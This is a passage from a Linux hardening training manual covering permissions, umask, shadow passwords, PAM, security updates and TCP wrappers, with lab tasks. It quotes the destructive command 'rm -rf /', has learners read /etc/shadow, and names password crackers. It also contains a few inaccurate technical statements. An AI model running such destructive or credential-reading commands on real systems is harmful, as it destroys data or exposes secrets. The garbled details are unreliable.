5. Open a Terminal Window.

6. Enter su - User2 to switch to the User2 account.

7. Attempt to access all four files from the previous task.

8. Identify which ones you can access, the level of access (by trying to cre-ate a file, for example), and the ones you cannot access.

File Name Access Granted?Level of AccessGranted

/Marketing/Campaign.txt Yes rwx/Marketing/Tracking.txt Yes rwx/Research/Software.txt No None/Research/Development.txt No None

Verify that the access is correct based on the permissions you assigned inthe previous task.

9. Activate the Workplace Switcher, and click any open space to switch toanother workspace.

10. Open a Terminal Window.

11. Enter su - User3 to switch to the User3 account.

168 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 222: SCNP Hardening

12. Attempt to access all four files from the previous task.

13. Identify which ones you can access, the level of access (by trying to cre-ate a file, for example), and the ones you cannot access.

File Name Access Granted?Level of AccessGranted

/Marketing/Campaign.txt No None/Marketing/Tracking.txt No None/Research/Software.txt Yes rwx/Research/Development.txt Yes rwx

Verify that the access is correct based on the permissions you assigned inthe previous task.

14. Switch to another workspace, open a Terminal Window, and switch tothe User4 account.

15. Attempt to access all four files from the previous task.

16. Identify which ones you can access, the level of access (by trying to cre-ate a file, for example), and the ones you cannot access.

File Name Access Granted?Level of AccessGranted

/Marketing/Campaign.txt No None/Marketing/Tracking.txt No None/Research/Software.txt Yes rwx/Research/Development.txt Yes rwx

Verify that the access is correct based on the permissions you assigned inthe previous task.

17. Close all windows and workspaces, and return to the root account.

The SetUID, SetGID, and the Sticky Bit PermissionsEarlier, when you were first looking at permissions, three other things were listedin addition to Read, Write, Execute, and No Permission—SetUID, SetGID, andthe Sticky Bit. The SetUID (or Set User Identification) permission bit can be seton an executable file. When set on a file, the file will execute not with the per-missions of the user who is running the program, but with the permissions of theowner of the program. The use of this is not suggested, as it can cause securityproblems—having a program execute by one user with the permissions of a dif-ferent user. SetGID (or Set Group Identification) is similar to SetUID, only thepermissions on the executable are based on group permissions.

Lesson 3: Hardening Linux Computers 169

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 223: SCNP Hardening

Applications that are designed to use the SetUID or the SetGID permission mustbe properly secured. These applications are often programmed to run as root, andany attempt at altering these files could lead to a system breach.

It is rumored that the Sticky Bit feature was originally created to let an applica-tion remain (or stick) in the computer’s memory even after it had finishedrunning. This would allow for quicker recall and execution if and when thatobject were to be called again. As systems have increased in power and the abili-ties of memory (both in speed and capacity) have increased, the need for theSticky Bit has diminished. However, a new use for the Sticky Bit has evolved.When the Sticky Bit is set for a directory, such as /tmp, it protects the files withinthat directory from deletion by non-owners. Consider the file /tmp/yrlyrept. If theSticky Bit has been set for /tmp, only the owner of the /tmp/yrlyrept file or theowner of the /tmp directory can delete the file.

In the following examples you will see the process of setting the setGID, setUID,and the Sticky Bit permissions. In the command chmod -v 1777 file, thechmod command itself should be familiar to you by now, the -v just tells themachine to be verbose—to give an output related to the command, rather thanjust executing the command silently.

Using chmod as is done in the first of the examples listed below sets the permis-sions on files to rwxrwxrwx—there is nothing new about that, but now we canlook at the bits in front of those nine:

- - - r w x r w x r w x

• The 10th bit (reading from the right as we do in binary) designates thesticky bit.

• The 11th bit (reading from the right) designates the SetGID bit.

• The 12th bit (reading from the right) designates the SetUID bit.

So the command chmod 1777 file would give all three groups (owner,group, other) read, write, and execute permissions, but set the sticky bit so thatonly the root account could delete the file.

Here are some other possible commands and their meanings. All commands giverwx to all three objects; only the 10th, 11th, and 12th bits are of interest to us forthis demonstration.

Command Result Commentchmod -v 777 file Mode of file changed to 0777

(rwxrwxrwx).chmod -v 1777 file Mode of file changed to 1777

(rwxrwxrwt).Sticky Bit is set.

chmod -v 2777 file Mode of file changed to 2777(rwxrwsrwx).

GID is set.

chmod -v 3777 file Mode of file changed to 3777(rwxrwsrwt).

GID and Sticky Bit are set.

chmod -v 4777 file Mode of file changed to 4777(rwsrwxrwx).

UID is set.

chmod -v 5777 file Mode of file changed to 5777(rwsrwxrwt).

UID and Sticky Bit are set.

chmod -v 6777 file Mode of file changed to 6777(rwsrwsrwx).

GID and UID are set.

breach:The successful defeat of

security controls which couldresult in a penetration of the

system. A violation ofcontrols of a particular

information system such thatinformation assets or system

components are undulyexposed.

170 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 224: SCNP Hardening

Command Result Commentchmod -v 7777 file Mode of file changed to 7777

(rwsrwsrwt).GID, UID, and Sticky Bit are set.

The umask CommandWhenever a user creates a file of directory, Linux must have a system of assign-ing the initial permissions to that object. The system that Linux uses is called amask. The mask is set using a command called umask. The mask is the compli-ment of the octal value that is assigned as permissions to an object.

Here are several examples:

• If the permissions of a file are 664, the mask value is 002.

• If the permissions of a file are 666, the mask value is 000.

• If the permissions of a file are 663, the mask value is 003.

Looking at this in reverse, if you have a mask of 662, the effective permissionsare 004. If you have a mask of 066, the permissions are 600.

The default umask value can be set for all users in the /etc/bashrc file. By default,the lines that determine the umask setting look like this:

if [ "`id -gn'`" = "`id -un'`" -a '`id -u'` -gt 99 ]; thenumask 002

else

umask 022fi

The lines mean that any user with a UID greater than 99 will get a umask valueof 002. Any user with a UID less than 99, including root and system accounts,will get a umask value of 022. Remember that when new users are created, theirUIDs start at 500, ensuring that all normal users of the system will get a umaskvalue of 002 as their default. The effective setting of this is the compliment octalvalue, which is 664. A setting of 664 means the user will have rw-, the groupwill have rw-, and the others will have r- -.

This may or may not be suitable for your environment, but it is recommended—from a security perspective—that this be changed, because it is not advisable tohave all files readable by everyone (the others). For this reason, it is suggestedthat the permissions be changed so that all UIDs greater than 99 use a mask of006, and that all UIDs less than 99 use a mask of 066. To restrict other groupmembers from being able to write to all files while allowing all read access, youcould use the mask 022

In previous versions of RedHat Linux, the default umaskvalue was set in the /etc/profile file, and the UIDthreshold was 14.

Lesson 3: Hardening Linux Computers 171

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 225: SCNP Hardening

TASK 3B-4Configuring umask Settings

Setup: You are logged on to Red Hat 8 as root.

1. In your home directory, create a new file called Mask.test.

2. View the permissions for the new file. If necessary, close the Propertieswindow.

3. Navigate to the /etc/bashrc file, and make a copy of it.

4. Use a text editor (for instance, gedit) to open the /etc/bashrc file. Viewthe umask settings.

5. Change the settings for UID greater than 99 to 006, and change the set-tings for UID less than 99 to 046 to follow the recommendations outlinedin the previous Concepts section.

6. Close the /etc/bashrc file.

7. Log out and then log back in as root.

8. In your home directory, create a new file called Mask2.test.

9. Compare the permissions of the two test documents to verify the newumask settings are in effect.

10. Return the umask settings in the /etc/bashrc file to their defaults. Youcan either re-edit the changed file, or delete the changed file and rename thebackup that you made earlier in this task.

11. Close all open windows.

Password SecurityAll user accounts in Linux require a password. However, there is no defaultmethod in place that prevents the password from being blank, often referred to asa null password. In order for an account to be authenticated by the system, theuser name and password provided during the login session must match the infor-mation stored in the system.

During the installation of Linux, the default method of handling passwords is touse Message Digest 5 (MD5) encryption. If you choose not to use MD5 duringinstallation—a practice that is recommended you not do—the system will defaultto Data Encryption Standard (DES) encryption for the passwords. DES limitspasswords to eight alphanumeric characters (meaning no punctuation or specialcharacters), which creates an encryption of only 56 bits. It is said only 56 bits,since modern computers can crack a 56-bit password very quickly, even if themethod used is brute-force cracking.

172 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 226: SCNP Hardening

Password FileThe initial operation of UNIX in storing passwords was to have a single world-readable file that held all the passwords, in their encrypted form. Although thispractice allowed for the system and applications all to have a single point ofaccess for quick authentication of user accounts, it created a security risk.

Because the file is world-readable, all users have access to read the file. However,you do not want to alter this file to no longer be readable by everyone, becausesystem functions and applications that are designed to use the file will no longerhave access.

Because any user could read the file, and the cleartext password hash was plainlyvisible; this was the root of the problem. A user could simply view the file andwrite down (or even copy to a floppy disk) the password hash. They could thentake the hash home and run a password cracking utility on the hash. Passwordcracking tools like Crack and Jack The Ripper would make short work of thischallenge, and the password would be revealed in short time.

The default location for the passwords is the /etc/passwd file. Because this file isworld-readable, you can simply navigate to it and view the contents. In this file,the following line shows what a user’s entry would look like:

Account_Name:Password:UID:GID:Full_Name:Directory:Program

Where:

• Account_Name—This is the user account name used during login.

• Password—This is the hash of the user’s password. If the password is null,there will be no entry here, which will remain empty (::).

• UID—This is the assigned User Identification of the user account.

• GID—This is the assigned Group Identification of the user account.

• Full_Name—This can be the user’s full name, or other information, asdesired.

• Directory—This is the user account’s home directory.

• Program—This defines the shell (or other program) that will run when theuser account is authenticated during the login process.

You saw this file earlier in this lesson, but here it is again for your reference.

cracking:The act of breaking into acomputer system.

Crack:A popular hacking tool usedto decode encryptedpasswords. Systemadministrators also useCrack to assess weakpasswords by novice usersin order to enhance thesecurity of the AIS.

Lesson 3: Hardening Linux Computers 173

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 227: SCNP Hardening

Figure 3-16: An example /etc/passwd file on a Linux computer.

In the event that shadow passwords are used, the previous entry in the /etc/passwd file will have a significant change. Instead of the password files showingthe hash of the user’s password, only a single X will be displayed. This is anindictor that shadow passwords are being used. No longer can any user learn thepassword hash of every other user—including root, by the way—through viewingthe /etc/passwd file.

The Shadow Password FileIf you accepted the default during installation, as it is highly recommended youdo, then your passwords are not stored in the world-readable /etc/passwd file.They will instead be stored in a file called etc/shadow.

The /etc/shadow file is not readable by every user of the system; it is only read-able by the root account. This feature alone increases the security of the entiresystem considerably.

The format of the /etc/shadow file is similar to the /etc/passwd file, but the fieldsare different. In this file, the following line shows what a user’s entry would looklike:

Account_Name:Password:Last:Min:Max:Warn:Expire:Disable:Reserved

174 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 228: SCNP Hardening

Where:

• Account_Name—This is the user account name used during login.

• Password—This is the hash of the password.

• Last—This is the number of days since January 1, 1970, since the passwordwas last changed.

• Min—This is the minimum number of days a user must wait before chang-ing the password again.

• Max—This is the maximum number of days before a user must change thepassword.

• Warn—This is the number of days prior to password expiration that the userreceives a warning.

• Expire—This is the number of days after a password expires that the accountbecomes disabled.

• Disable—This is the number of days since January 1, 1970, that the accounthas been disabled.

• Reserved—This is a reserved field intended for future use.

In Figure 3-17, you can see that when the /etc/shadow file is used, the /etc/passwd file is still in use. This is the reason that the fields are different. The /etc/passwd file still contains the UID and GID information, for example. The /etc/shadow file is concerned only with information tied to the account accessing thesystem.

Figure 3-17: An example /etc/shadow file on a Linux computer.

UNIX was released to theworld in 1970; therefore,January 1, 1970, isconsidered the starting dateof the OS.

Lesson 3: Hardening Linux Computers 175

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 229: SCNP Hardening

TASK 3B-5Viewing the Password Files

Setup: You are logged on to Red Hat 8 as root.

1. Open a Terminal Window, and navigate to the /etc/directory, and cat thepasswd file.

2. Read the entries in the file, and determine if the shadow file is in use onyour system.

3. Cat the /etc/shadow file.

4. Observe the differences between the two files.

5. Close any open windows.

Managing PasswordsEven though the shadow password file has options for the ages, such as minimumage and maximum age, of passwords, you should still manage these values to usewhat the security policy of your organization dictates. When the shadow pass-word file is used, every new user account that is created refers to a configurationfile called /etc/login.defs. This file contains the aging options, as well as the pass-word length configuration. The default values in this file are as described in thefollowing table.

Entry Default Value DescriptionPASS_MAX_DAYS 99999 The MAX_DAYS entry defines the number of days a

user can go without changing his or her password. Thedefault of 99999 is approximately 274 years, which ismost likely a bit longer than what most organizationswill require! If your organization requires high levels ofsecurity, this value will likely be 30 days or fewer. Formost organizations, three months, listed as 90 days, isan adequate time for this value.

PASS_MIN_DAYS 0 Conversely, the MIN_DAYS value has a default of 0,and in most situations will be left at 0. This allows auser to change their password at any time.

PASS_MIN_LEN 5 The MIN_LEN entry defines the minimum length of thepassword. The default setting of 5 is acceptable, butincreasing that value is recommended to at least 7 forhigher security. Remember, a longer password (as longas the rules for strong passwords are followed:alphanumeric, special characters, punctuation, and soforth) is better than a shorter password.

PASS_WARN_AGE 7 The WARN_AGE entry defines the numbers of days auser will be warned about an expiring password, priorto the actual expiration date.

Password aging can also bemanaged in Red Hat User

Manager.

176 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 230: SCNP Hardening

TASK 3B-6Managing Passwords

Setup: You are logged on to Red Hat 8 as root.

1. Open a text editor, and the /etc/login.defs file.

2. Change PASS_MAX_DAYS to 20, leave PASS_MIN_DAYS at 0, changePASS_MIN_LEN to 7, and leave PASS_WARN_AGE at 7.

3. Save the file and close the editor.

Pluggable Authentication Modules (PAM)As the UNIX and Linux operating systems evolved, the introduction of theshadow password file allowed for greater security in regards to passwords. How-ever, as new and more advanced systems of authentication, such as Smart Cards,are introduced, this solution also has the potential to create problems. It would bevery inefficient to recompile all applications to use each and every new form ofauthentication that is brought into the OS. For example, FTP would have to bemade aware of a user authenticating by using a Smart Card, instead of by usingthe traditional user account name and password.

So, how do these programs know that a new authentication scheme is being used,such as the shadow password file instead of the traditional password file? Theanswer is Pluggable Authentication Modules (PAM). Applications only need to bePAM-aware, or compiled to know and use PAM for authentication purposes.

PAM enables the program designer to ignore the authentication method used. Nolonger does the designer need to worry about creating unique versions of anapplication for each authentication method, nor to recompile an application everytime a new authentication scheme is introduced.

The directory that holds the modules is /etc/pam.d/. In this directory, there will beunique files that define the specific requirements for a program that is PAM-aware. Although these files are designed to function properly when installed, youmight want to change them. If you do want to alter these configuration files, it isimportant to understand their structure.

PAM Configuration FilesOne of the first things you might notice if you look into the details of the con-figuration files is that the names of the files are based on the services that anapplication requires, not the name of the application itself. In some instances, thisis the same, such as the login application using the login service. However, youwill also see differences, such as the wu-ftp application using the ftp service. Thismeans that, in the /etc/pam.d/ directory, you will see a file for login and a file forftp, but not a file for wu-ftp.

These configuration files take advantage of the modular format of PAM to pro-vide the authentication services for their applications. The files contain calls tothese modules, which are usually located in the /lib/security directory. Each linein the configuration file defines a module type, a control flag, a path to the mod-ule, and module arguments (this is an optional component, not in every line).

Lesson 3: Hardening Linux Computers 177

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 231: SCNP Hardening

PAM ModulesThere are four distinct PAM module types. Each type is relative to a specific partof the authentication process. The four types are:

• auth—This module is used to authenticate the user. This can be done in avariety of ways, including requesting and verifying user name and password.

• account—This module is used to verify that access is allowed. This caninclude checking the user account status, for expiration, or time-of-dayrestrictions.

• password—This module is used to define passwords.

• session—This module is used once a user has been authenticated to managethe session. This might include refreshing session tokens.

Any one module has the ability to address more than one module type. A modulemay go so far as to have all four types. In the configuration file, the module typewill be the first item that is detailed. The format of the lines in the configurationfile is as follows:

Module-Type Control-Flag Module-Path Module-Arguments

An example of such a line is the following line, from the rlogin configurationfile:

auth required /lib/security/pam_nologin.so

In this example, the module type is auth, the control flag is required, the modulepath is /lib/security/pam_nologin.so, and there are no arguments presented.

You have seen the module types defined, and the path is self-explanatory at thisstage. The remaining component of this line that requires discussion is the controlflag. The control flag in this example is required. There are four possible controlflags:

• Required—This flag states that the module must be checked successfully forthe authentication to be allowed. In the event that the module checks and theauthentication fails, the user is not informed until all modules have beenchecked.

• Requisite—This flag states that the module must be checked successfully forthe authentication to be allowed. In the event the check fails, the user isinformed immediately; with a message stating the failure was Required orRequisite.

• Sufficient—This flag states that if the user is successfully authenticated, andthere have been no Required flag failures, the authentication process is con-sidered complete, the user is authenticated, and no other modules arechecked.

• Optional—This flag is not used very often. If the module check is a successor a failure, then this flag has no role to play. It is only when no other mod-ules have determined a success or a failure that this flag is used. In that case,the overall PAM authentication for the module type is used.

By combining the module types and the control flags, modules can be stacked toprovide a very specific authentication package. The order of the modules stackedis significant, as the system executes the modules from the top down. Stackingthese modules enables the administrator to define a group of conditions that mustbe met in order for authentication to be successful. The following example ofstacked modules is the rlogin configuration file:

PAM Modules

PAM Control Flags

178 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 232: SCNP Hardening

auth required /lib/security/pam_nologin.soauth required /lib/security/pam_securetty.soauth required /lib/security/pam_env.soauth sufficient /lib/security/pam_rhosts_auth.soauth required /lib/security/pam_stack.so service=system-auth

By reading this stack, you can determine the following details of the configura-tion file:

• Line one—PAM will verify that the /etc/nologin file does not exist.

• Line two—PAM will verify that the user is not trying to login remotely asroot, over an unencrypted network connection.

• Line three—PAM will load any environment variables that are defined.

• Line four—PAM will verify a successful rhosts authentication; if successful,the connection is allowed, and authentication is complete.

• Line five—PAM will use standard user name and password authentication.(This line will be checked only if the previous line is not successful.)

Security with PAMOne way that PAM can be used to increase the security of the system is with theother configuration file. This file—found at /etc/pam.d/other—is what the systemuses when it cannot find a configuration file for a specific application. The defaultconfiguration of this file is as follows:

auth required /lib/security/pam_deny.soaccount required /lib/security/pam_deny.sopassword required /lib/security/pam_deny.sosession required /lib/security/pam_deny.so

This is the equivalent of stating that unless there is a configuration file that cangrant access, deny everyone. The pam_deny.so will always produce a failure, andbecause this configuration file includes the pam_deny.so on all four types, a fail-ure will always be the end result of checking this file.

Lesson 3: Hardening Linux Computers 179

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 233: SCNP Hardening

The Red Hat Linux distribution includes many other PAM modules that have aneffect on the security of the system. The following is just a partial listing of themodules available in the system, and a brief description of what and/or how theycan be used:

• pam_access—This checks for access information, such as account expiration.

• pam_cracklib—This checks the strength of passwords.

• pam_deny—This denies all access.

• pam_group—This sets permissions based on /etc/group and otherconfigurable options.

• pam_lastlog—This displays information about the last user logged in.

• pam_limits—This sets limits on resources.

• pam_nologin—This denies login based on /etc/nologin.

• pam_permit—This always allows access (it’s the inverse of the pam_denymodule).

• pam_rhosts_auth—This uses the authentication of /rlogin/rsh.

• pam_securetty—This uses the authentication of /etc/securetty.

• pam_tally—This tracks login attempts, and allows for locking of accountsafter a defined number of failed attempts.

• pam_time—This allows for time-based controls to applications and services.

• pam_wheel—This defines authentication based on the user account belong-ing to the wheel group.

Securing Access with PAMOne of the tasks you will likely want to perform is to control access to objects orto the system based on time. For example, your corporate security policy mightstate that users are not allowed to log in when the office is closed. You canimplement this policy by using the module pam_time, found at /lib/security/pam_time.so. This module can control access based on any of the following elements:

• The user account name.

• The time of day.

• The day of the week.

• The service the user account is requesting to use.

• The terminal where the request originates.

180 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 234: SCNP Hardening

The execution of the pam_time module is based on the associated configurationfile. For the time restrictions, the configuration file is /etc/security/time.conf. Thefields in this configuration file are:

• services—This field is the actual service that is to have time restrictionsenforced. A very common example of this is the login service. In the eventthat there are multiple services, such as login and su, in the configurationfield, this is listed as login&su.

• ttys—This field is the terminal that is to have time restrictions enforced.ttyp* will enforce the restrictions on all remote terminal connections, suchas Telnet. tty* will enforce the restrictions on all console terminalconnections.

• users—This field defines the users affected by the time restrictions. If youwant to have the restrictions affect all users, substitute the * character in thislocation.

• time—This field defines the actual times that are going to be restricted. Thetimes are entered using the 24-hour clock format, where 11:00 A.M. to 3:00P.M. is 1100-1500. Also defined in this field are day entries, if the restric-tions are based on the day of the week. Days are defined by their first twoletters—Monday is Mo, Wednesday is We, and so on. If you want to restrictall days of the week, you can use the two letters Al; if you want to restrictonly weekdays, you can use the two letters Wk; and if you want to restrictonly weekends, you can use the two letters Wd.

The fields are input with the use of four special characters: the exclamation point(!), the pipe symbol (|), the ampersand (&), and the asterisk(*).

• The ! character means NOT. An example is !root, meaning not root, orexcept root.

• The | character means OR. An example is User1|User2, meaning User1 orUser2.

• The & character means AND. An example is User1&User2, meaning bothUser1 and User2.

• The * character is a wildcard. An example is log*, meaning everything thatstarts with the log. The * character, when used in the users field, means alluser accounts.

By combining these characters and options, you can create a line in the /etc/security/time.conf file that restricts access according to your policy. The followingexample shows a line that restricts access. No user, other than User1, is allowedto log in to the system (by using either remote or console access) during thehours of 9:00 P.M. and 5:00 A.M., every day of the week.

login;tty*;*!User1;!Al2100-0500

The second example is similar to the first. However, in this example, users arerestricted from using a remote terminal connection, but they are allowed to use aconsole connection to gain access to the system. The same user and hour restric-tions are in place.

login;ttyp*!tty*;*!User1;!Al2100-0500

In this final example, all users except for root are denied access to the consolelogin at all times.

login;tty*&!ttyp*;*!root;!Al0000-2400

When accessing yourcomputer via the console,you are using tty*. Whenaccessing remotely, you areusing ttyp*.

Lesson 3: Hardening Linux Computers 181

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 235: SCNP Hardening

Security UpdatesIt is a given that in the security world there will be holes found in applications,and that other security risks are going to be found. The world of security isdynamic, and it can be very difficult for an administrator to keep up-to-date withall the newest exploits and/or attacks against systems.

In the security hole, unfortunately, is the Red Hat distribution of Linux. Red Hat,Inc., has stated their commitment to releasing updates to fix the holes as quicklyas possible. Once the patch has been tested and is ready for release, it will bedistributed to the public as an official Red Hat errata update. When you aredownloading updates, be sure to check the signature of the file, and compare it tothe signature of the file you download. It is common for an attacker to create aTrojan version of an update, which contains a new security hole.

There are two methods for obtaining security updates. One is through the RedHat Network, and the other is through official errata.

The Red Hat NetworkThe Red Hat Network provides for an automated updating process. The systemcan check your system, determine the needed updates, download the update,verify the signature of the update, and even perform the install automatically. Ifyou do not want the update to install automatically, you can schedule the installsat a time you determine.

In order for the Red Hat Network update system to work, each computer that youwant to have updated will have to create a system profile. The system profileidentifies the computer using software and hardware information, and the infor-mation is kept confidential.

When the Red Hat Network determines your system needs an update, you can benotified via email. In order to apply the update, there is a program called Red HatUpdate Agent. More information about this process can be found at http://rhn.redhat.com.

Security ErrataRed Hat issues security errata reports, as they are published, on the Red HatLinux Errata Web site www.redhat.com/apps/support/errata. Here, you canselect a product and display the security updates that are unique to that product.This saves you the time of sorting through all the updates to find the ones of rel-evance to you.

All official Red Hat Security Errata updates are signed with the Red Hat, Inc.,GPG key. Red Hat 8.0 will automatically attempt to verify the GPG signaturebefore installing an RPM. If you do not have the key installed, it can be found onthe Red Hat CD-ROM. The key can be imported to a keyring by using the fol-lowing command:

rpm --import /mnt/cdrom/RPM-GPG-KEY

Once it is installed, you will want to verify the key. To display all keys installedfor further RPM verification, use the following command:

rpm -qa gpg-pubkey*

For the Red Hat, Inc., key, you should see the following output:

gpg-pubkey-db42a60e-37ea5438

attack:An attempt to bypasssecurity controls on a

computer. The attack mayalter, release, or deny data.

Whether an attack willsucceed depends on the

vulnerability of the computersystem and the effectivenessof existing countermeasures.

182 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 236: SCNP Hardening

Once you have verified the GPG signature of the update, then you are sure thatthe contents are official and have not been modified.

Topic 3CAccess ControlIn Linux, configuring access control can be accomplished by using TCP wrappersand the xinetd superdaemon. To start, let’s look at TCP wrappers.

TCP WrappersFirewalls and other perimeter protection schemes provide an excellent means ofprotecting the entire network from attacks. There will be times when you wantmore granular control, and want to control access to and from individual serviceson a single computer. Linux provides the ability to do this at the machine,enabling you to create an additional layer of security at the source of the service.This ability is provided with TCP wrappers and the xinetd daemon. The historybehind the TCP wrappers program is worth noting.

The year was 1990, and the location was Eindhoven University of Technology, inEindhoven, Netherlands. The University was under heavy attack from a Dutchhacker who had obtained root level access. This hacker opened a lot of eyes tothe destructiveness of hackers with the simple command rm -rf /. This com-mand can cause considerable damage; it is similar to the format command inMS-DOS. The University employed Wietse Venema in the Mathematics andComputer Science Department. In response to these attacks, he developed a pro-gram that could control host access, track, and log intruders. This program iswhat we now know as TCP wrappers.

TCP wrappers work by providing a point between a request for a service and theservice itself. This point—the TCP wrapper daemon (tcpd)—answers the requestsfor network services on behalf of the service. The daemon then consults configu-ration files and performs security checks before it allows the request to be givento the service. This provides two functional advantages to the network over tradi-tional service controlling systems:

• The TCP wrappers operate separately from the service or application that thewrappers are protecting. This way, applications and services do not need tobe rewritten and can use common configuration files for management.

• The connecting client does not know that TCP wrappers are in operation.There will never be a message back to the remote client reporting on successor failure.

TCP wrapper:A software tool for securitywhich provides additionalnetwork logging, andrestricts service access toauthorized hosts by service.

hacker:A malicious or inquisitivemeddler who tries todiscover information bypoking around. A personwho enjoys learning thedetails of programmingsystems and how to stretchtheir capabilities, as opposedto most users who prefer tolearn the necessaryminimum.

Lesson 3: Hardening Linux Computers 183

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 237: SCNP Hardening

TCP Wrappers Configuration FilesTwo configuration files are used by TCP wrappers to provide host-based accesscontrol: /etc/hosts.deny and /etc/hosts.allow. The default behavior (if there are norules in either folder) is to provide everyone access to the services. In otherwords, you need to create some rules if you want control.

The rules of these two files must be created in a careful order. This is due to thefact that the system will read from the top down in the file, and will read rules inthe allow file before reading the rules in the deny file. Therefore, a specific denialrule for a host, made in the deny file, will not be used if that same host is grantedaccess in the allow file.

The rules in the configuration files are single-line entries. Any line that is blankor that has a comment character (#) will be ignored. The rules have the followingfields:

<daemon_list>: <client_list>[: spawn <shell_command> ]

Where:

• daemon_list defines the process(es) or wildcard(s), each separated bywhitespace.

• client_list defines the hostname(s), IP address(es), pattern(s), or wildcard(s),each separated by whitespace, to use when a process name matches therequested service.

• shell_command defines an optional function to be done or executed if a ruleis implemented.

The description for client_list mentions pattern(s). Patterns are useful for group-ing clients together. The common method for grouping clients is to use thedecimal point (.). By using the decimal point, you can identify groups of hosts,either by domain name or by IP address. Placing the decimal point at the leadingedge of a string will include all hosts that share that string ending. So the follow-ing two examples would be grouped together if the client_list was.securitycertified.net:

scnp.securitycertified.netscna.securitycertified.net

Likewise, the decimal point can be used with IP addresses. If you have a client_list of 192.168., then all IP addresses that begin with 192.168 will be groupedtogether.

Wildcards can also be used in the creation of access rules. There are fivewildcards that you can use:

• ALL—This wildcard matches every client with a given service (or everyservice with a client).

• LOCAL—This wildcard matches any host that does not contain a decimalpoint character (.).

• KNOWN—This wildcard matches any host where the hostname and theaddress are known or where the user is known.

• UNKNOWN—This wildcard matches any host where the hostname and theaddress are unknown or where the user is unknown.

• PARANOID—This wildcard matches any host where the hostname does notmatch the host address.

host based:Information, such as audit

data from a single hostwhich may be used to detect

intrusions.

The default behavior of theaccess control of TCP

wrappers is to grant access.There must be a rule to deny

all in hosts.deny, if that isthe behavior you want.

Configuring TCP Wrappers

184 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 238: SCNP Hardening

In addition to these wildcards, there is another keyword that can be used in theselines: EXCEPT. The use is logical, as you would anticipate. For example, if youwant to have every host from the 192.168.10.0 network, but not the single host192.168.10.5, then the rule would be:

ALL: 192.168.10.0 EXCEPT 192.168.10.5

Take a look at the following sample lines. Remember that lines with the (#) char-acter are comment lines, so they will be ignored.

# all hosts in the local networkALL: LOCAL# all hosts in securitycertified.net, exceptinsecure.securitycertified.netALL: .securitycertified.net EXCEPT insecure.securitycertified.net# all hosts in the 172.16.23.0 networkALL: 172.16.23.# all local hosts access to the ftp servicein.ftpd: LOCAL# all local hosts access to all services, except for the ftpserviceALL EXCEPT in.ftpd: LOCAL# single host 10.20.23.45 access to the telnet servicein.telnetd: 10.20.23.45

In this example, you might wonder if they are lines granting access or lines deny-ing access. In reality, they are both. The deciding factor is not the line itself, butthe location of the line. Mentioned earlier was the fact that there are two configu-ration files, one called /etc/hosts.deny and the other /etc/hosts.allow. By placingthe line in one of the files, you are deciding on the denial of access or the grant-ing of access.

The following configuration examples show different levels of security on thenetwork. This first example grants access to all local hosts, all hosts in thesecuritycertified.net domain, except for hacker1.securitycertified.net, and all hostsin the 10.20.23.0 network, except for 10.20.23.45. For the denial, the hosts.denyconfiguration specifically denies all other hosts.

/etc/hosts.allowALL:LOCALALL: .securitycertified.net EXCEPT hacker1.securitycertified.netALL: 10.20.23. EXCEPT 10.20.23.45

/etc/hosts.denyALL: ALL

The next example is very restrictive, only allowing a few hosts to have access. Inaddition, access is variable to specific services on the machine.

/etc/hosts.allowALL: 172.168.10.54in.ftpd: 172.168.10.42in.telnetd: 172.168.10.42

/etc/hosts.denyALL: ALL

Finally, this third example is also quite restrictive. In this case, the only allowedservice is an internal ftp server.

Lesson 3: Hardening Linux Computers 185

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 239: SCNP Hardening

/etc/hosts.allowin.ftpd: LOCAL

/etc/hosts.denyALL:ALL

The last option that we need to mention was listed in the full rule, called shell_command. This is very often used for what are known as booby traps.Remember, the rule line is service(s):client(s):shell_command. Shell commandsuse expansions (sometimes called variables) in their execution. Shell-commandexpansions apply to all shell commands, and include those listed in the followingtable.

Expansion Description%a Client IP address.%A Server IP address.%c Client information, including user name and hostname, or user name and IP address.%d Daemon process name.%h Client hostname. If unavailable, the IP address is used.%H Server hostname. If unavailable, the IP address is used.%u Client user name. If unavailable, “unknown” is listed.

Here is an example booby trap line, from the hosts.deny file. This line will writea log line that contains client information when a host in the 192.168.23.0/24 net-work attempts to use Telnet:

in.telnetd: 192.168.23.: spawn (/bin/echo %c >>/var/log/telnet.log)

186 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 240: SCNP Hardening

TASK 3C-1Controlling Access with TCP Wrappers

Objective: To investigate how TCP Wrappers can be used for access con-trol by developing a possible solution for a fictitious scenario.

1. You have been assigned the project to manage access to certain Linuxservices on your corporate network. Your manager has given you thefollowing restrictions to implement; in the space provided, create thenecessary /etc/hosts.allow and /etc/hosts.deny files.

• All local hosts should be able to use all services, except for telnet.

• All hosts from the securitycertified.net domain should be denied, exceptfor scnp_server.securitycertified.net, which should have access to allservices.

• All hosts from the 172.16.32.0/24 network should be granted access toall services except telnet.

• All other hosts and services should be denied.

